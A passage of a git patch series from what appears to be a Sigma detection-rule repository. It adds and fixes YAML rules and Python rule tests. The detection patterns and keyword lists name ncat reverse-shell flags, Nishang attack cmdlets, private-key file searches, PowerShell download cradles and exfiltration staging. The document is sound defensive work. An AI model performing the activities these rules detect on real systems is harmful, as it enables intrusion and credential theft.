parse_json(RawData).flow.pkts_toclient + flow.bytes_toserver: parse_json(RawData).flow.bytes_toserver + flow.bytes_toclient: parse_json(RawData).flow.bytes_toclient + flow.start: parse_json(RawData).flow.start + payload_printable: parse_json(RawData).payload_printable + stream: parse_json(RawData).stream + http.hostname: parse_json(RawData).http.hostname + http.url: parse_json(RawData).http.url + http.http_user_agent: parse_json(RawData).http.http_user_agent + http.http_method: parse_json(RawData).http.http_method + http.protocol: parse_json(RawData).http.protocol + http.length: parse_json(RawData).http.length + http.status: parse_json(RawData).http.status + http.http_refer: parse_json(RawData).http.http_refer + fileinfo.filename: parse_json(RawData).file.path + fileinfo.size: parse_json(RawData).file.size From 50c47a4ed0fcdbe260299fbe5ae4578d0d9eeb74 Mon Sep 17 00:00:00 2001 From: frack113 Date: Sat, 17 Jul 2021 10:32:29 +0200 Subject: [PATCH 0018/1367] check duplicate id --- tests/test_rules.py | 6 ++++++ 1 file changed, 6 insertions(+) diff --git a/tests/test_rules.py b/tests/test_rules.py index 9849bbdd..6f4ed6f7 100755 --- a/tests/test_rules.py +++ b/tests/test_rules.py @@ -234,6 +234,7 @@ class TestRules(unittest.TestCase): def test_missing_id(self): faulty_rules = [] + list_id = [] for file in self.yield_next_rule_file_path(self.path_to_rules): id = self.get_rule_part(file_path=file, part_name="id") if not id: @@ -242,6 +243,11 @@ class TestRules(unittest.TestCase): elif len(id) != 36: print(Fore.YELLOW + "Rule {} has a malformed 'id' (not 36 chars).".format(file)) faulty_rules.append(file) + elif id in list_id: + print(Fore.YELLOW + "Rule {} has a duplicate 'id'.".format(file)) + faulty_rules.append(file) + else: + list_id.append(id) self.assertEqual(faulty_rules, [], Fore.RED + "There are rules with missing or malformed 'id' fields. Create an id (e.g. here: https://www.uuidgenerator.net/version4) and add it to the reported rule(s).") From da6135ccb3fb1576d6d22ae59b55c42b531e0fc2 Mon Sep 17 00:00:00 2001 From: frack113 Date: Tue, 20 Jul 2021 11:20:30 +0200 Subject: [PATCH 0019/1367] add process_creation_discover_private_keys.yml --- ...process_creation_discover_private_keys.yml | 40 +++++++++++++++++++ 1 file changed, 40 insertions(+) create mode 100644 rules/windows/process_creation/process_creation_discover_private_keys.yml diff --git a/rules/windows/process_creation/process_creation_discover_private_keys.yml b/rules/windows/process_creation/process_creation_discover_private_keys.yml new file mode 100644 index 00000000..99251447 --- /dev/null +++ b/rules/windows/process_creation/process_creation_discover_private_keys.yml @@ -0,0 +1,40 @@ +title: Discover Private Keys +id: 213d6a77-3d55-4ce8-ba74-fcfef741974e +status: experimental +author: frack113 +date: 2021/07/20 +description: Adversaries may search for private key certificate files on compromised systems for insecurely stored credential +references: + - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md +tags: + - attack.credential-access + - attack.t1552.004 +logsource: + category: process_creation + product: windows +detection: + selection_exe: + CommandLine|contains: + - 'dir ' + - 'findstr ' + selection_ext: + CommandLine|contains: + - '.key' + - '.pgp' + - '.gpg' + - '.ppk' + - '.p12' + - '.pem' + - '.pfx' + - '.cer' + - '.p7b' + - '.asc' + condition: selection_exe and selection_ext +fields: + - ComputerName + - User + - CommandLine + - ParentCommandLine +falsepositives: + - Unknown +level: medium From 66aaa2210cf400c1ef04f8263167f41b497606eb Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Tue, 20 Jul 2021 11:26:22 +0200 Subject: [PATCH 0020/1367] refactor: widened PS1 Empire cmdlines rule --- .../process_creation/win_susp_powershell_empire_launch.yml | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/rules/windows/process_creation/win_susp_powershell_empire_launch.yml b/rules/windows/process_creation/win_susp_powershell_empire_launch.yml index 3859866a..7b63469b 100644 --- a/rules/windows/process_creation/win_susp_powershell_empire_launch.yml +++ b/rules/windows/process_creation/win_susp_powershell_empire_launch.yml @@ -9,7 +9,7 @@ references: - https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/data/module_source/privesc/Invoke-EventVwrBypass.ps1#L64 author: Florian Roth date: 2019/04/20 -modified: 2020/07/13 +modified: 2020/07/20 tags: - attack.execution - attack.t1059.001 @@ -25,6 +25,8 @@ detection: - ' -NoP -NonI -W Hidden -enc ' - ' -noP -sta -w 1 -enc' - ' -enc SQB' - - ' -nop -exec bypass -EncodedCommand SQB' + - ' -nop -exec bypass -EncodedCommand ' condition: selection +falsepositives: + - Other tools that incidentally use the same command line parameters level: critical From cf8904b56000d58aef53675598973b738261a6db Mon Sep 17 00:00:00 2001 From: frack113 Date: Tue, 20 Jul 2021 12:22:31 +0200 Subject: [PATCH 0021/1367] fix files_with_incorrect_mitre_tags --- .../process_creation/process_creation_discover_private_keys.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/process_creation/process_creation_discover_private_keys.yml b/rules/windows/process_creation/process_creation_discover_private_keys.yml index 99251447..7400b511 100644 --- a/rules/windows/process_creation/process_creation_discover_private_keys.yml +++ b/rules/windows/process_creation/process_creation_discover_private_keys.yml @@ -7,7 +7,7 @@ description: Adversaries may search for private key certificate files on comprom references: - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md tags: - - attack.credential-access + - attack.credential_access - attack.t1552.004 logsource: category: process_creation From b031a1b4b7d3df6ed4303c45d7d9ae675aa97c26 Mon Sep 17 00:00:00 2001 From: frack113 Date: Tue, 20 Jul 2021 13:13:53 +0200 Subject: [PATCH 0022/1367] add win_susp_zip_compress.yml --- .../windows/builtin/win_susp_zip_compress.yml | 51 +++++++++++++++++++ 1 file changed, 51 insertions(+) create mode 100644 rules/windows/builtin/win_susp_zip_compress.yml diff --git a/rules/windows/builtin/win_susp_zip_compress.yml b/rules/windows/builtin/win_susp_zip_compress.yml new file mode 100644 index 00000000..b4bb1bbb --- /dev/null +++ b/rules/windows/builtin/win_susp_zip_compress.yml @@ -0,0 +1,51 @@ +action: global +title: Zip A Folder With PowerShell For Staging In Temp +id: 85a8e5ba-bd03-4bfb-bbfa-a4409a8f8b98 +status: experimental +author: frack113 +date: 2021/07/20 +description: Use living off the land tools to zip a file and stage it in the Windows temporary folder for later exfiltration +references: + - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md +tags: + - attack.collection + - attack.t1074.001 +falsepositives: + - Unknown +level: medium +--- +logsource: + product: windows + category: process_creation +detection: + selection: + CommandLine|contains|all: + - 'Compress-Archive ' + - ' -Path ' + - ' -DestinationPath ' + - '$env:TEMP\' + condition: selection +--- +logsource: + product: windows + service: powershell-classic +detection: + selection: + HostApplication|contains|all: + - 'Compress-Archive ' + - ' -Path ' + - ' -DestinationPath ' + - '$env:TEMP\' + condition: selection +--- +logsource: + product: windows + service: powershell +detection: + selection: + ContextInfo|contains|all: + - 'Compress-Archive ' + - ' -Path ' + - ' -DestinationPath ' + - '$env:TEMP\' + condition: selection \ No newline at end of file From 42005a07b76da82c78a94e8ed48237d933231a8c Mon Sep 17 00:00:00 2001 From: frack113 Date: Tue, 20 Jul 2021 16:12:24 +0200 Subject: [PATCH 0023/1367] update powershell_suspicious_download.yml --- .../powershell_suspicious_download.yml | 25 ++++++++++++++++--- 1 file changed, 22 insertions(+), 3 deletions(-) diff --git a/rules/windows/powershell/powershell_suspicious_download.yml b/rules/windows/powershell/powershell_suspicious_download.yml index 8d9ea014..52166117 100644 --- a/rules/windows/powershell/powershell_suspicious_download.yml +++ b/rules/windows/powershell/powershell_suspicious_download.yml @@ -1,3 +1,4 @@ +action: global title: Suspicious PowerShell Download id: 65531a81-a694-4e31-ae04-f8ba5bc33759 status: experimental @@ -8,6 +9,11 @@ tags: - attack.t1086 #an old one author: Florian Roth date: 2017/03/05 +modified: 2021/07/20 +falsepositives: + - PowerShell scripts that download content from the Internet +level: medium +--- logsource: product: windows service: powershell @@ -21,6 +27,19 @@ detection: - 'System.Net.WebClient' - '.DownloadString(' condition: downloadfile or downloadstring -falsepositives: - - PowerShell scripts that download content from the Internet -level: medium +--- +logsource: + product: windows + service: powershell-classic +detection: + downloadfile: + EventID: 400 # get 400 ,403 and 600 for 1 execution + HostApplication|contains|all: + - 'System.Net.WebClient' + - '.DownloadFile(' + downloadstring: + Eventid: 400 + HostApplication|contains|all: + - 'System.Net.WebClient' + - '.DownloadString(' + condition: downloadfile or downloadstring \ No newline at end of file From ba50a2309c75ec49a25a25c767658460cf52ac4e Mon Sep 17 00:00:00 2001 From: frack113 Date: Tue, 20 Jul 2021 16:26:13 +0200 Subject: [PATCH 0024/1367] fix case EventID --- rules/windows/powershell/powershell_suspicious_download.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/powershell/powershell_suspicious_download.yml b/rules/windows/powershell/powershell_suspicious_download.yml index 52166117..4677ef36 100644 --- a/rules/windows/powershell/powershell_suspicious_download.yml +++ b/rules/windows/powershell/powershell_suspicious_download.yml @@ -38,7 +38,7 @@ detection: - 'System.Net.WebClient' - '.DownloadFile(' downloadstring: - Eventid: 400 + EventID: 400 HostApplication|contains|all: - 'System.Net.WebClient' - '.DownloadString(' From ddb47446137fce86efda39f7e6abdfefa386e3c7 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Tue, 20 Jul 2021 21:14:48 +0200 Subject: [PATCH 0025/1367] regsvr32 anomaly rule update https://twitter.com/BlackMatter23/status/1417545425297580045 --- rules/windows/process_creation/win_susp_regsvr32_no_dll.yml | 3 +++ 1 file changed, 3 insertions(+) diff --git a/rules/windows/process_creation/win_susp_regsvr32_no_dll.yml b/rules/windows/process_creation/win_susp_regsvr32_no_dll.yml index 50c46fd7..021e88fb 100644 --- a/rules/windows/process_creation/win_susp_regsvr32_no_dll.yml +++ b/rules/windows/process_creation/win_susp_regsvr32_no_dll.yml @@ -4,6 +4,7 @@ status: experimental description: Detects a regsvr.exe execution that doesn't contain a DLL in the command line author: Florian Roth date: 2019/07/17 +modified: 2021/07/20 references: - https://app.any.run/tasks/34221348-072d-4b70-93f3-aa71f6ebecad/ tags: @@ -21,6 +22,8 @@ detection: - '.ocx' - '.cpl' - '.ax' + - '.bav' + - '.ppl' condition: selection and not filter fields: - CommandLine From b9b0ef20666e72cf47f3d8c9a694ef197ade199d Mon Sep 17 00:00:00 2001 From: frack113 Date: Wed, 21 Jul 2021 09:44:26 +0200 Subject: [PATCH 0026/1367] convert keywords to correct field name Payload --- .../powershell/powershell_nishang_malicious_commandlets.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/rules/windows/powershell/powershell_nishang_malicious_commandlets.yml b/rules/windows/powershell/powershell_nishang_malicious_commandlets.yml index 21547f4d..aa660129 100644 --- a/rules/windows/powershell/powershell_nishang_malicious_commandlets.yml +++ b/rules/windows/powershell/powershell_nishang_malicious_commandlets.yml @@ -3,7 +3,7 @@ id: f772cee9-b7c2-4cb2-8f07-49870adc02e0 status: experimental description: Detects Commandlet names and arguments from the Nishang exploitation framework date: 2019/05/16 -modified: 2021/04/23 +modified: 2021/07/21 references: - https://github.com/samratashok/nishang tags: @@ -16,7 +16,7 @@ logsource: service: powershell definition: It is recommended to use the new "Script Block Logging" of PowerShell v5 https://adsecurity.org/?p=2277 detection: - keywords: + Payload: - Add-ConstrainedDelegationBackdoor - Set-DCShadowPermissions - DNS_TXT_Pwnage From 44254038d377dc9639f9a76214e59d942645469a Mon Sep 17 00:00:00 2001 From: frack113 Date: Wed, 21 Jul 2021 10:01:46 +0200 Subject: [PATCH 0027/1367] fix human error : test-sigmac Error 4 --- ...wershell_nishang_malicious_commandlets.yml | 145 +++++++++--------- 1 file changed, 73 insertions(+), 72 deletions(-) diff --git a/rules/windows/powershell/powershell_nishang_malicious_commandlets.yml b/rules/windows/powershell/powershell_nishang_malicious_commandlets.yml index aa660129..e8a9ef6c 100644 --- a/rules/windows/powershell/powershell_nishang_malicious_commandlets.yml +++ b/rules/windows/powershell/powershell_nishang_malicious_commandlets.yml @@ -16,78 +16,79 @@ logsource: service: powershell definition: It is recommended to use the new "Script Block Logging" of PowerShell v5 https://adsecurity.org/?p=2277 detection: - Payload: - - Add-ConstrainedDelegationBackdoor - - Set-DCShadowPermissions - - DNS_TXT_Pwnage - - Execute-OnTime - - HTTP-Backdoor - - Set-RemotePSRemoting - - Set-RemoteWMI - - Invoke-AmsiBypass - - Out-CHM - - Out-HTA - - Out-SCF - - Out-SCT - - Out-Shortcut - - Out-WebQuery - - Out-Word - - Enable-Duplication - - Remove-Update - - Download-Execute-PS - - Download_Execute - - Execute-Command-MSSQL - - Execute-DNSTXT-Code - - Out-RundllCommand - - Copy-VSS - - FireBuster - - FireListener - - Get-Information - - Get-PassHints - - Get-WLAN-Keys - - Get-Web-Credentials - - Invoke-CredentialsPhish - - Invoke-MimikatzWDigestDowngrade - - Invoke-SSIDExfil - - Invoke-SessionGopher - - Keylogger - - Invoke-Interceptor - - Create-MultipleSessions - - Invoke-NetworkRelay - - Run-EXEonRemote - - Invoke-Prasadhak - - Invoke-BruteForce - - Password-List - - Invoke-JSRatRegsvr - - Invoke-JSRatRundll - - Invoke-PoshRatHttps - - Invoke-PowerShellIcmp - - Invoke-PowerShellUdp - - Invoke-PSGcat - - Invoke-PsGcatAgent - - Remove-PoshRat - - Add-Persistance - - ExetoText - - Invoke-Decode - - Invoke-Encode - - Parse_Keys - - Remove-Persistence - - StringtoBase64 - - TexttoExe - - Powerpreter - - Nishang - - DataToEncode - - LoggedKeys - - OUT-DNSTXT - # - Jitter # Prone to FPs - - ExfilOption - - DumpCerts - - DumpCreds - - Shellcode32 - - Shellcode64 - - NotAllNameSpaces - - exfill - - FakeDC + keywords: + Payload|contains: + - Add-ConstrainedDelegationBackdoor + - Set-DCShadowPermissions + - DNS_TXT_Pwnage + - Execute-OnTime + - HTTP-Backdoor + - Set-RemotePSRemoting + - Set-RemoteWMI + - Invoke-AmsiBypass + - Out-CHM + - Out-HTA + - Out-SCF + - Out-SCT + - Out-Shortcut + - Out-WebQuery + - Out-Word + - Enable-Duplication + - Remove-Update + - Download-Execute-PS + - Download_Execute + - Execute-Command-MSSQL + - Execute-DNSTXT-Code + - Out-RundllCommand + - Copy-VSS + - FireBuster + - FireListener + - Get-Information + - Get-PassHints + - Get-WLAN-Keys + - Get-Web-Credentials + - Invoke-CredentialsPhish + - Invoke-MimikatzWDigestDowngrade + - Invoke-SSIDExfil + - Invoke-SessionGopher + - Keylogger + - Invoke-Interceptor + - Create-MultipleSessions + - Invoke-NetworkRelay + - Run-EXEonRemote + - Invoke-Prasadhak + - Invoke-BruteForce + - Password-List + - Invoke-JSRatRegsvr + - Invoke-JSRatRundll + - Invoke-PoshRatHttps + - Invoke-PowerShellIcmp + - Invoke-PowerShellUdp + - Invoke-PSGcat + - Invoke-PsGcatAgent + - Remove-PoshRat + - Add-Persistance + - ExetoText + - Invoke-Decode + - Invoke-Encode + - Parse_Keys + - Remove-Persistence + - StringtoBase64 + - TexttoExe + - Powerpreter + - Nishang + - DataToEncode + - LoggedKeys + - OUT-DNSTXT + # - Jitter # Prone to FPs + - ExfilOption + - DumpCerts + - DumpCreds + - Shellcode32 + - Shellcode64 + - NotAllNameSpaces + - exfill + - FakeDC condition: keywords falsepositives: - Penetration testing From 1b537cac5d2a2065b03fffb06e15dcc29aea58d4 Mon Sep 17 00:00:00 2001 From: frack113 Date: Wed, 21 Jul 2021 10:55:54 +0200 Subject: [PATCH 0028/1367] add sysmon_netcat_execution.yml --- .../sysmon_netcat_execution.yml | 24 +++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 rules/windows/process_creation/sysmon_netcat_execution.yml diff --git a/rules/windows/process_creation/sysmon_netcat_execution.yml b/rules/windows/process_creation/sysmon_netcat_execution.yml new file mode 100644 index 00000000..5c187881 --- /dev/null +++ b/rules/windows/process_creation/sysmon_netcat_execution.yml @@ -0,0 +1,24 @@ +title: Ncat Execution +id: e31033fc-33f0-4020-9a16-faf9b31cbf08 +status: experimental +author: frack113 +date: 2021/07/21 +description: Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network +references: + - https://nmap.org/ncat/ + - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1095/T1095.md +tags: + - attack.command_and_control + - attack.t1095 +logsource: + category: process_creation + product: windows +detection: + selection: + # can not use OriginalFileName as is empty + Image|endswith: + - '\ncat.exe' + condition: selection +falsepositives: + - Legitimate ncat use +level: medium From 41c4f1d1575d29d0976c76204746dee585a94ca8 Mon Sep 17 00:00:00 2001 From: frack113 Date: Wed, 21 Jul 2021 13:04:27 +0200 Subject: [PATCH 0029/1367] add powershell_powercat.yml --- .../powershell/powershell_powercat.yml | 40 +++++++++++++++++++ 1 file changed, 40 insertions(+) create mode 100644 rules/windows/powershell/powershell_powercat.yml diff --git a/rules/windows/powershell/powershell_powercat.yml b/rules/windows/powershell/powershell_powercat.yml new file mode 100644 index 00000000..24a1a7af --- /dev/null +++ b/rules/windows/powershell/powershell_powercat.yml @@ -0,0 +1,40 @@ +action: global +title: Netcat The Powershell Version +id: c5b20776-639a-49bf-94c7-84f912b91c15 +status: experimental +author: frack113 +date: 2021/07/21 +description: Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network +references: + - https://nmap.org/ncat/ + - https://github.com/besimorhino/powercat + - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1095/T1095.md +tags: + - attack.command_and_control + - attack.t109 +falsepositives: + - Unknown +level: medium +--- +logsource: + product: windows + service: powershell-classic +detection: + selection: + EventID: 400 + HostApplication|contains: + - 'powercat ' + - 'powercat.ps1' + condition: selection +--- +logsource: + product: windows + service: powershell + +detection: + selection: + EventID: 4103 + ContextInfo|contains: + - 'powercat ' + - 'powercat.ps1' + condition: selection From 72da7a30539cb18a294e1850667a687a10e655c9 Mon Sep 17 00:00:00 2001 From: frack113 Date: Wed, 21 Jul 2021 13:08:35 +0200 Subject: [PATCH 0030/1367] fix tags attack.t1095 --- rules/windows/powershell/powershell_powercat.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/powershell/powershell_powercat.yml b/rules/windows/powershell/powershell_powercat.yml index 24a1a7af..ab4bf464 100644 --- a/rules/windows/powershell/powershell_powercat.yml +++ b/rules/windows/powershell/powershell_powercat.yml @@ -11,7 +11,7 @@ references: - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1095/T1095.md tags: - attack.command_and_control - - attack.t109 + - attack.t1095 falsepositives: - Unknown level: medium From 4cc4df35d82e738c46d7c80cf3c010926e1dbcd1 Mon Sep 17 00:00:00 2001 From: frack113 Date: Wed, 21 Jul 2021 15:27:12 +0200 Subject: [PATCH 0031/1367] add powershell_suspicious_mail_acces.yml --- .../powershell_suspicious_mail_acces.yml | 27 +++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 rules/windows/powershell/powershell_suspicious_mail_acces.yml diff --git a/rules/windows/powershell/powershell_suspicious_mail_acces.yml b/rules/windows/powershell/powershell_suspicious_mail_acces.yml new file mode 100644 index 00000000..660c798a --- /dev/null +++ b/rules/windows/powershell/powershell_suspicious_mail_acces.yml @@ -0,0 +1,27 @@ +title: Powershell Local Email Collection +id: 2837e152-93c8-43d2-85ba-c3cd3c2ae614 +status: experimental +author: frack113 +date: 2021/07/21 +description: Adversaries may target user email on local systems to collect sensitive information. Files containing email data can be acquired from a user’s local system, such as Outlook storage or cache files. +references: + - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.001/T1114.001.md +tags: + - attack.collection + - attack.t1114.001 +logsource: + product: windows + service: powershell + description: EnableScriptBlockLogging must be set to enable +detection: + selection: + EventID: 4104 + ScriptBlockText|contains: + - 'Get-Inbox.ps1' + - 'Microsoft.Office.Interop.Outlook' + - 'Microsoft.Office.Interop.Outlook.olDefaultFolders' + - '-comobject outlook.application' + condition: selection +falsepositives: + - Unknown +level: medium From fe20158f5e0e46f8139ce906c3ce92648aaf07f5 Mon Sep 17 00:00:00 2001 From: frack113 Date: Wed, 21 Jul 2021 18:28:47 +0200 Subject: [PATCH 0032/1367] Update date and modified test --- rules/windows/builtin/win_susp_sdelete.yml | 2 +- tests/test_rules.py | 18 ++++++++++++++++++ 2 files changed, 19 insertions(+), 1 deletion(-) diff --git a/rules/windows/builtin/win_susp_sdelete.yml b/rules/windows/builtin/win_susp_sdelete.yml index 081c8d15..6dea5617 100644 --- a/rules/windows/builtin/win_susp_sdelete.yml +++ b/rules/windows/builtin/win_susp_sdelete.yml @@ -4,7 +4,7 @@ status: experimental description: Detects renaming of file while deletion with SDelete tool. author: Thomas Patzke date: 2017/06/14 -modified: 2020/08/2 +modified: 2020/08/02 references: - https://jpcertcc.github.io/ToolAnalysisResultSheet/details/sdelete.htm - https://www.jpcert.or.jp/english/pub/sr/ir_research.html diff --git a/tests/test_rules.py b/tests/test_rules.py index 6f4ed6f7..a53d70f0 100755 --- a/tests/test_rules.py +++ b/tests/test_rules.py @@ -277,6 +277,9 @@ class TestRules(unittest.TestCase): if not datefield: print(Fore.YELLOW + "Rule {} has no field 'date'.".format(file)) faulty_rules.append(file) + elif not isinstance(datefield, str): + print(Fore.YELLOW + "Rule {} has a malformed 'date' (should be YYYY/MM/DD).".format(file)) + faulty_rules.append(file) elif len(datefield) != 10: print(Fore.YELLOW + "Rule {} has a malformed 'date' (not 10 chars, should be YYYY/MM/DD).".format(file)) faulty_rules.append(file) @@ -284,6 +287,21 @@ class TestRules(unittest.TestCase): self.assertEqual(faulty_rules, [], Fore.RED + "There are rules with missing or malformed 'date' fields. (create one, e.g. date: 2019/01/14)") + def test_date_modified(self): + faulty_rules = [] + for file in self.yield_next_rule_file_path(self.path_to_rules): + modifiedfield = self.get_rule_part(file_path=file, part_name="modified") + if modifiedfield: + if not isinstance(modifiedfield, str): + print(Fore.YELLOW + "Rule {} has a malformed 'modified' (should be YYYY/MM/DD).".format(file)) + faulty_rules.append(file) + elif len(modifiedfield) != 10: + print(Fore.YELLOW + "Rule {} has a malformed 'modified' (not 10 chars, should be YYYY/MM/DD).".format(file)) + faulty_rules.append(file) + + self.assertEqual(faulty_rules, [], Fore.RED + + "There are rules with malformed 'modified' fields. (create one, e.g. date: 2019/01/14)") + def test_references(self): faulty_rules = [] for file in self.yield_next_rule_file_path(self.path_to_rules): From 985a80de9630a4bca09c33977e574a630959fcc1 Mon Sep 17 00:00:00 2001 From: frack113 Date: Thu, 22 Jul 2021 08:33:52 +0200 Subject: [PATCH 0033/1367] Find duplicate rules --- .../builtin/win_susp_eventlog_cleared.yml | 4 +++- .../win_susp_security_eventlog_cleared.yml | 24 ------------------- 2 files changed, 3 insertions(+), 25 deletions(-) delete mode 100644 rules/windows/builtin/win_susp_security_eventlog_cleared.yml diff --git a/rules/windows/builtin/win_susp_eventlog_cleared.yml b/rules/windows/builtin/win_susp_eventlog_cleared.yml index 2bb18452..67693faa 100644 --- a/rules/windows/builtin/win_susp_eventlog_cleared.yml +++ b/rules/windows/builtin/win_susp_eventlog_cleared.yml @@ -1,6 +1,9 @@ action: global title: Eventlog Cleared id: d99b79d2-0a6f-4f46-ad8b-260b6e17f982 +related: + id: f2f01843-e7b8-4f95-a35a-d23584476423 + type: obsoletes description: One of the Windows Eventlogs has been cleared. e.g. caused by "wevtutil cl" command execution references: - https://twitter.com/deviouspolack/status/832535435960209408 @@ -17,7 +20,6 @@ falsepositives: - Rollout of log collection agents (the setup routine often includes a reset of the local Eventlog) - System provisioning (system reset before the golden image creation) level: high - --- logsource: product: windows diff --git a/rules/windows/builtin/win_susp_security_eventlog_cleared.yml b/rules/windows/builtin/win_susp_security_eventlog_cleared.yml deleted file mode 100644 index 7485d301..00000000 --- a/rules/windows/builtin/win_susp_security_eventlog_cleared.yml +++ /dev/null @@ -1,24 +0,0 @@ -title: Security Eventlog Cleared -id: f2f01843-e7b8-4f95-a35a-d23584476423 -description: Some threat groups tend to delete the local 'Security' Eventlog using certain utitlities -tags: - - attack.defense_evasion - - attack.t1070 # an old one - - attack.t1070.001 - - car.2016-04-002 -author: Florian Roth -date: 2017/02/19 -modified: 2020/08/23 -logsource: - product: windows - service: security -detection: - selection: - EventID: - - 517 - - 1102 - condition: selection -falsepositives: - - Rollout of log collection agents (the setup routine often includes a reset of the local Eventlog) - - System provisioning (system reset before the golden image creation) -level: high From 3c85bba9981f311da074ec42bf6fd3ce0737f8f9 Mon Sep 17 00:00:00 2001 From: phantinuss Date: Thu, 15 Jul 2021 11:21:34 +0200 Subject: [PATCH 0034/1367] fix: according to the reference the condition should be or; it would never match otherwise anyways --- rules/windows/malware/win_mal_flowcloud.yml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/rules/windows/malware/win_mal_flowcloud.yml b/rules/windows/malware/win_mal_flowcloud.yml index 95a72af5..9dfb9f06 100644 --- a/rules/windows/malware/win_mal_flowcloud.yml +++ b/rules/windows/malware/win_mal_flowcloud.yml @@ -9,6 +9,7 @@ tags: - attack.persistence - attack.t1112 date: 2020/06/09 +modified: 2021/07/15 logsource: product: windows category: registry_event @@ -24,7 +25,7 @@ detection: - 'HKLM\HARDWARE\{2DB80286-1784-48b5-A751-B6ED1F490303}' - TargetObject|startswith: - 'HKLM\SYSTEM\Setup\PrintResponsor\' - condition: selection and selection2 + condition: selection or selection2 falsepositives: - Unknown level: critical From e4880169d322cd997a4f41f078301957aba54470 Mon Sep 17 00:00:00 2001 From: phantinuss Date: Fri, 16 Jul 2021 11:31:23 +0200 Subject: [PATCH 0035/1367] add sysmon_status and sysmon_error category to thor logsources --- tools/config/thor.yml | 24 ++++++++++++++++++++++++ 1 file changed, 24 insertions(+) diff --git a/tools/config/thor.yml b/tools/config/thor.yml index e17bc140..1568816d 100644 --- a/tools/config/thor.yml +++ b/tools/config/thor.yml @@ -33,6 +33,22 @@ logsources: rewrite: product: windows service: sysmon + sysmon_status1: + category: sysmon_status + product: windows + conditions: + EventID: 4 + rewrite: + product: windows + service: sysmon + sysmon_status2: + category: sysmon_status + product: windows + conditions: + EventID: 16 + rewrite: + product: windows + service: sysmon process_terminated: category: process_termination product: windows @@ -177,6 +193,14 @@ logsources: rewrite: product: windows service: sysmon + sysmon_error: + category: sysmon_error + product: windows + conditions: + EventID: 255 + rewrite: + product: windows + service: sysmon # target system configurations windows-application: product: windows From 3b5f3d8befbb4604db2926648253c926a3d8086f Mon Sep 17 00:00:00 2001 From: phantinuss Date: Thu, 22 Jul 2021 10:14:54 +0200 Subject: [PATCH 0036/1367] fix: indentation --- tools/config/thor.yml | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/tools/config/thor.yml b/tools/config/thor.yml index 1568816d..00b2725b 100644 --- a/tools/config/thor.yml +++ b/tools/config/thor.yml @@ -194,10 +194,10 @@ logsources: product: windows service: sysmon sysmon_error: - category: sysmon_error - product: windows - conditions: - EventID: 255 + category: sysmon_error + product: windows + conditions: + EventID: 255 rewrite: product: windows service: sysmon From 1cfb0e4689545e265e68a50c403eef91545246e8 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Thu, 22 Jul 2021 11:09:45 +0200 Subject: [PATCH 0037/1367] Update win_mal_flowcloud.yml --- rules/windows/malware/win_mal_flowcloud.yml | 8 ++------ 1 file changed, 2 insertions(+), 6 deletions(-) diff --git a/rules/windows/malware/win_mal_flowcloud.yml b/rules/windows/malware/win_mal_flowcloud.yml index 9dfb9f06..159ec036 100644 --- a/rules/windows/malware/win_mal_flowcloud.yml +++ b/rules/windows/malware/win_mal_flowcloud.yml @@ -9,23 +9,19 @@ tags: - attack.persistence - attack.t1112 date: 2020/06/09 -modified: 2021/07/15 +modified: 2021/07/22 logsource: product: windows category: registry_event detection: selection: - EventID: - - 12 # key create - - 13 # value set - selection2: - TargetObject: - 'HKLM\HARDWARE\{804423C2-F490-4ac3-BFA5-13DEDE63A71A}' - 'HKLM\HARDWARE\{A5124AF5-DF23-49bf-B0ED-A18ED3DEA027}' - 'HKLM\HARDWARE\{2DB80286-1784-48b5-A751-B6ED1F490303}' - TargetObject|startswith: - 'HKLM\SYSTEM\Setup\PrintResponsor\' - condition: selection or selection2 + condition: selection falsepositives: - Unknown level: critical From cbc7a746d4d4975bc0a243fa7152c87617648642 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Thu, 22 Jul 2021 15:00:50 +0200 Subject: [PATCH 0038/1367] feat: some often used ncat command line strings --- .../windows/process_creation/sysmon_netcat_execution.yml | 9 ++++++++- 1 file changed, 8 insertions(+), 1 deletion(-) diff --git a/rules/windows/process_creation/sysmon_netcat_execution.yml b/rules/windows/process_creation/sysmon_netcat_execution.yml index 5c187881..21344091 100644 --- a/rules/windows/process_creation/sysmon_netcat_execution.yml +++ b/rules/windows/process_creation/sysmon_netcat_execution.yml @@ -18,7 +18,14 @@ detection: # can not use OriginalFileName as is empty Image|endswith: - '\ncat.exe' - condition: selection + selection_cmdline: + # Typical command lines + CommandLine|contains: + - ' -lvp ' + - ' -l --proxy-type http ' + - ' --exec cmd.exe ' + - ' -vnl --exec ' + condition: selection or selection_cmdline falsepositives: - Legitimate ncat use level: medium From c7685e1c1831080f5f34823e68a97b86d1b88713 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Thu, 22 Jul 2021 11:04:15 -0500 Subject: [PATCH 0039/1367] Create sysmon_dns_over_https_enabled.yml --- .../sysmon_dns_over_https_enabled.yml | 28 +++++++++++++++++++ 1 file changed, 28 insertions(+) create mode 100644 rules/windows/registry_event/sysmon_dns_over_https_enabled.yml diff --git a/rules/windows/registry_event/sysmon_dns_over_https_enabled.yml b/rules/windows/registry_event/sysmon_dns_over_https_enabled.yml new file mode 100644 index 00000000..777261b3 --- /dev/null 